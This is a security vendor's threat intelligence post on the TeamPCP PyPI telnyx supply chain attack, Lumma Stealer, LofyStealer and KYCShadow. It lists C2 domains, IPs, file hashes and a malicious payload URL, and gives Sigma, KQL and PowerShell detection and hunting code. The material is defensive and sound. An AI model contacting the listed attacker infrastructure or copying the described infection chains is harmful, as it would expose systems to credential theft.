Back to Intelligence

TeamPCP Supply Chain & Lumma Stealer Surge: Multi-Vector Credential Theft Campaign — OTX Analysis

SA
Security Arsenal Team
May 3, 2026
6 min read

Threat Summary

Recent OTX pulses indicate a convergence of sophisticated credential theft operations targeting both enterprise supply chains and individual consumers. The primary threats involve TeamPCP weaponizing the legitimate telnyx Python SDK on PyPI to deliver credential harvesters via steganography, and widespread distribution of Lumma Stealer through ClickFix phishing campaigns and GhostSocks proxy infrastructure. Additionally, the LofyGang is actively targeting Minecraft players with the LofyStealer, and a new Android banking trojan, KYCShadow, is focusing on financial theft in India. The collective objective is the mass exfiltration of session cookies, banking credentials, and OTPs for sale on dark web forums.

Threat Actor / Malware Profile

TeamPCP (Telnyx SDK Campaign)

  • Distribution: Supply chain compromise via PyPI. Malicious versions of the telnyx SDK (750k+ downloads).
  • Payload Behavior: Three-stage architecture. 1. Trojanized package triggers platform-specific loader. 2. Downloads second-stage payload hidden in a WAV file (steganography). 3. Deploys credential harvester.
  • Persistence: Established via the compromised Python package installation.
  • C2 Communication: Contacts hardcoded hostnames (e.g., scan.aquasecurtiy.org).

Lumma Stealer & GhostSocks

  • Distribution: ClickFix-style phishing (fake browser errors), MaaS (Malware-as-a-Service) via underground forums.
  • Payload Behavior: Lumma Stealer focuses on browser data; GhostSocks turns infected devices into residential proxy nodes.
  • Persistence: HijackLoader utilizes DLL sideloading with renamed legitimate binaries.
  • C2 Communication: Uses TLS encryption to blend in with normal traffic; domains like retreaw.click.

LofyStealer (LofyGang)

  • Distribution: Social engineering targeting Minecraft players.
  • Payload Behavior: Node.js-based loader (53.5MB) disguising itself in libraries, executing a 1.4MB in-memory C++ payload.
  • Capabilities: Steals cookies, passwords, tokens, credit cards from 8+ browsers.

KYCShadow

  • Distribution: WhatsApp messages masquerading as bank KYC verification apps.
  • Capabilities: OTP theft, SMS interception, WebView phishing, VPN traffic manipulation.

IOC Analysis

The provided IOCs are a mix of infrastructure and payload artifacts:

  • Domains/Hostnames: Several C2 domains such as aquasecurtiy.org (TeamPCP), serv.biz (KYCShadow), and retreaw.click (GhostSocks). These should be blocked immediately at the perimeter and DNS level.
  • IP Addresses: Includes 24.152.36.241 and 85.11.161.198. These are likely staging or C2 servers.
  • File Hashes: A large volume of SHA256, MD5, and SHA1 hashes are provided for the loaders, droppers, and payload DLLs/EXEs. SOC teams should utilize EDR correlation capabilities to hunt for these specific files on endpoints.
  • URLs: Specific HTTP endpoints hosting malicious MSI payloads (e.g., http://85.11.161.198:6600/...).

Detection Engineering

Sigma Rules

YAML
---
title: Potential TeamPCP Telnyx SDK Malicious Execution
id: 8e2c3f1a-4b5d-4c2e-9e1a-8f8d1b2c3d4e
description: Detects suspicious execution patterns associated with the TeamPCP campaign involving msbuild.exe and unusual network connections or child processes.
status: experimental
date: 2026/05/03
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/66000000
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\msbuild.exe'
        CommandLine|contains:
            - 'telnyx'
    condition: selection
falsepositives:
    - Legitimate developer builds using the Telnyx SDK
level: high
tags:
    - attack.execution
    - attack.t1059.001
---
title: ClickFix Phishing PowerShell to MSI Execution
id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d
description: Detects PowerShell executing msiexec.exe with remote URLs, a common pattern in ClickFix campaigns delivering HijackLoader and Lumma Stealer.
status: experimental
date: 2026/05/03
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        Image|endswith: '\powershell.exe'
        CommandLine|contains: 'msiexec'
    selection_child:
        Image|endswith: '\msiexec.exe'
        CommandLine|contains:
            - 'http://'
            - 'https://'
    condition: all of selection_*
falsepositives:
    - Legitimate software installation scripts
level: critical
tags:
    - attack.initial_access
    - attack.t1566.001
---
title: Suspicious Node.js Loader (LofyStealer)
id: 9f8e7d6c-5b4a-3c2d-1e0f-9a8b7c6d5e4f
description: Detects Node.js processes spawning unusual child processes or exhibiting high memory usage patterns consistent with LofyStealer/GrabBot loaders.
status: experimental
date: 2026/05/03
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/66000002
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\node.exe'
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\rundll32.exe'
    filter_legit:
        CommandLine|contains:
            - 'npm'
            - 'yarn'
            - 'webpack'
    condition: selection and not filter_legit
falsepositives:
    - Legitimate Node.js development workflows
level: medium
tags:
    - attack.defense_evasion
    - attack.t1059.001

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for TeamPCP and LofyStealer File Hashes
DeviceProcessEvents
| where InitiatingProcessFileName in~ ("python.exe", "node.exe", "powershell.exe")
| where SHA256 in (
    "6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a",
    "8395c3268d5c5dbae1c7c6d4bb3c318c752ba4608cfcd90eb97ffb94a910eac2",
    "d2a0d5f564628773b6af7b9c11f6b86531a875bd2d186d7081ab62748a800ebb",
    "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881",
    "45d4040e76a0d357dd6e236e185aba2eb82420d78640bfd1f3dede32b33931f7",
    "f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc"
)
| project Timestamp, DeviceName, AccountName, FolderPath, SHA256, InitiatingProcessFileName
;
// Hunt for C2 Domains associated with GhostSocks, TeamPCP, and KYCShadow
DeviceNetworkEvents
| where RemoteUrl in (
    "scan.aquasecurtiy.org",
    "tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io",
    "aquasecurtiy.org",
    "retreaw.click",
    "w2.bruggebogeyed.site",
    "robinhuds.com",
    "serv.biz",
    "serv.xyz",
    "api.biz"
) or RemoteIP in ("24.152.36.241", "85.11.161.198")
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName

PowerShell Hunt Script

PowerShell
<#
.SYNOPSIS
    Hunt for artifacts associated with TeamPCP, LofyStealer, and Lumma Stealer based on OTX Pulse data.
.DESCRIPTION
    Scans specific directories for file hashes and checks for suspicious network connections.
#>

$TargetHashes = @(
    "6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a",
    "8395c3268d5c5dbae1c7c6d4bb3c318c752ba4608cfcd90eb97ffb94a910eac2",
    "d2a0d5f564628773b6af7b9c11f6b86531a875bd2d186d7081ab62748a800ebb",
    "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881",
    "45d4040e76a0d357dd6e236e185aba2eb82420d78640bfd1f3dede32b33931f7",
    "f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc",
    "c529217014b732abbe646046c07ce8f0366a42051839d4cb3be5b400285fc728",
    "1d261b45e73b5b712becb12ed182ec89d3dd0d73143a2dd8ff5512da489a50eb"
)

Write-Host "[+] Starting scan for OTX Malware Artifacts..." -ForegroundColor Cyan

# Check common Python package directories for TeamPCP artifacts
$PythonPaths = @("$env:LOCALAPPDATA\Programs\Python", "$env:APPDATA\Python")
foreach ($Path in $PythonPaths) {
    if (Test-Path $Path) {
        Write-Host "[*] Scanning Python directory: $Path" -ForegroundColor Yellow
        Get-ChildItem -Path $Path -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
            $Hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            if ($TargetHashes -contains $Hash) {
                Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName) (SHA256: $Hash)" -ForegroundColor Red
            }
        }
    }
}

# Check for suspicious Node.js modules (LofyStealer)
$NodePaths = @("$env:APPDATA\npm", "$env:USERPROFILE\node_modules")
foreach ($Path in $NodePaths) {
    if (Test-Path $Path) {
        Write-Host "[*] Scanning Node.js directory: $Path" -ForegroundColor Yellow
        Get-ChildItem -Path $Path -Recurse -File -Include ("*.js", "*.node") -ErrorAction SilentlyContinue | ForEach-Object {
            $Hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            if ($TargetHashes -contains $Hash) {
                Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName) (SHA256: $Hash)" -ForegroundColor Red
            }
        }
    }
}

Write-Host "[+] Scan complete." -ForegroundColor Green

Response Priorities

  • Immediate: Block all listed domains and IPs at the firewall and proxy servers. Initiate a hunt for the SHA256 file hashes provided across all endpoints.
  • 24h: Conduct identity verification and credential resets for any accounts where the associated device flagged a positive hit for these infostealers, particularly targeting developers (TeamPCP) and finance teams (KYCShadow).
  • 1 Week: Review supply chain security policies regarding PyPI usage; implement code signing requirements and pre-deployment scanning for internal Python packages. Restrict PowerShell execution policies and enforce application allow-listing to prevent ClickFix infection chains.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialsinfostealersupply-chainlumma-stealerteampcpcredential-theft

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action